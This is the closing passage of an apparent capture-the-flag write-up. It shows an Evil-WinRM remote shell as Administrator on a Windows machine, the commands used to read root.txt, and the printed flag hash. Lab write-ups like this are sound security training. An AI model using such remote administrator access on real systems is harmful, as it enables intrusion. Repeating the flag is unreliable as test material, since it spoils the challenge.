Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         2/2/2025   7:31 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
2e166de877e3683a84c6120a9909e6b0
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 


Written by Dany Sucuc (sckull), RedTeamer & Pentester wannabe